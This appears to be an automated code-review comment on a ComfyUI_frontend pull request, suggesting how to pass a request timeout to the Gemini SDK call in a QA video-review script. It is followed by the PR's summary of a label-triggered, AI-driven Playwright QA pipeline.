Repository: Comfy-Org/ComfyUI_frontend
Length of output: 989
🌐 Web query:
@google/generative-ai deprecated SDK generateContent timeout parameter API
💡 Result:
The @google/generative-ai Node.js SDK is deprecated. Migrate to the new @google/genai SDK, which is the unified Google Gen AI SDK for JavaScript/TypeScript. In the deprecated @google/generative-ai SDK, the generateContent method supported a timeout via RequestOptions: const model = genAI.getGenerativeModel({ model: "gemini-pro" }); const result = await model.generateContent(prompt, { ...generationConfig, requestOptions: { timeout: 30000 } // milliseconds }); This direct timeout parameter/requestOptions.timeout is not carried over to the new SDK. In the current @google/genai SDK (as of 2026), use httpOptions in GenerateContentConfig for timeouts: import { GoogleGenAI } from '@google/genai'; const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY }); const response = await ai.models.generateContent({ model: 'gemini-2.5-flash', contents: 'Your prompt', config: { httpOptions: { timeout: 30000 } // milliseconds, overrides client defaults } }); Timeouts can also be set at the client level: const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY, httpOptions: { timeout: 60000 } }); For cancellation (client-side), use abortSignal: AbortSignal.timeout(30000). No evidence of a direct 'timeout' parameter deprecation announcement for generateContent specifically, but the entire old SDK is deprecated (end-of-life Nov 2025), and the new API uses httpOptions instead of requestOptions.
Citations:
- 1: https://googleapis.github.io/js-genai/release_docs/interfaces/types.GenerateContentConfig.html
- 2: https://googleapis.github.io/js-genai/release_docs/index.html
- 3: https://github.com/google-gemini/deprecated-generative-ai-js
- 4: https://www.npmjs.com/package/@google/generative-ai?activeTab=versions
- 5: Feature Addition: Introduce Request Timeout Configuration google-gemini/deprecated-generative-ai-js#31
- 6: https://github.com/google-gemini/deprecated-generative-ai-js/blob/main/docs/reference/files/generative-ai.requestoptions.timeout.md
- 7: https://mintlify.com/googleapis/python-genai/guides/http-options
- 8: https://ai.google.dev/gemini-api/docs/migrate
- 9: https://raw.githubusercontent.com/googleapis/js-genai/refs/heads/main/codegen_instructions.md
🏁 Script executed:
sed -n '580,598p' scripts/qa-video-review.ts

Repository: Comfy-Org/ComfyUI_frontend
Length of output: 491
Fix timeout parameter format for @google/generative-ai SDK.
The code passes timeout directly in the options object, but the deprecated @google/generative-ai SDK expects it wrapped in requestOptions. Update to:
const result = await model.generateContent(parts, {
requestOptions: { timeout: options.timeoutMs }
})
Without this change, the timeout will be ignored and API calls may hang indefinitely.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-video-review.ts` around lines 587 - 589, The timeout is being
passed directly to model.generateContent which the deprecated
`@google/generative-ai` SDK ignores; update the call to pass the timeout inside a
requestOptions object (i.e., when calling model.generateContent(parts, ...) wrap
options.timeoutMs as requestOptions: { timeout: options.timeoutMs }) so the SDK
respects the timeout setting.
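Whichever SDK option ends up being honored, a client-side guard makes a hung request fail deterministically; a generic sketch not tied to either SDK's API:

```typescript
// Sketch: race the API call against a timer. Works with any promise-returning
// client, including a generateContent(...) call, regardless of SDK options.
async function withTimeout<T>(p: Promise<T>, ms: number): Promise<T> {
  let timer: ReturnType<typeof setTimeout> | undefined
  const timeout = new Promise<never>((_, reject) => {
    timer = setTimeout(() => reject(new Error(`timed out after ${ms}ms`)), ms)
  })
  try {
    return await Promise.race([p, timeout])
  } finally {
    clearTimeout(timer) // don't keep the event loop alive after settling
  }
}
```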
Summary
Automated QA pipeline that uses Claude to write Playwright E2E tests reproducing reported bugs, records video evidence, and deploys results to Cloudflare Pages.
Changes
- Three-phase pipeline triggered by labels (qa-changes, qa-full, qa-issue)
- QA dependencies: @google/generative-ai and @anthropic-ai/claude-agent-sdk (installed inline in CI, not added to package.json)

Files added (17 files, ~7.5k lines)
- .github/workflows/pr-qa.yaml
- scripts/qa-agent.ts
- scripts/qa-record.ts
- scripts/qa-reproduce.ts
- scripts/qa-analyze-pr.ts
- scripts/qa-video-review.ts
- scripts/qa-deploy-pages.sh
- scripts/qa-generate-test.ts
- scripts/qa-report-template.html
- scripts/qa-batch.sh
- .claude/skills/comfy-qa/SKILL.md
- docs/qa/TROUBLESHOOTING.md
- docs/qa/backlog.md, models.md
- knip.config.ts

Review Focus
- Label-triggered only (qa-changes, qa-full, qa-issue) — no automatic runs
- Trivial assertions (e.g. count > 0) are banned — tests must assert bug-specific behavior
- Main branch dist/ is cached by SHA to speed up before/after comparisons

┆Issue is synchronized with this Notion page by Unito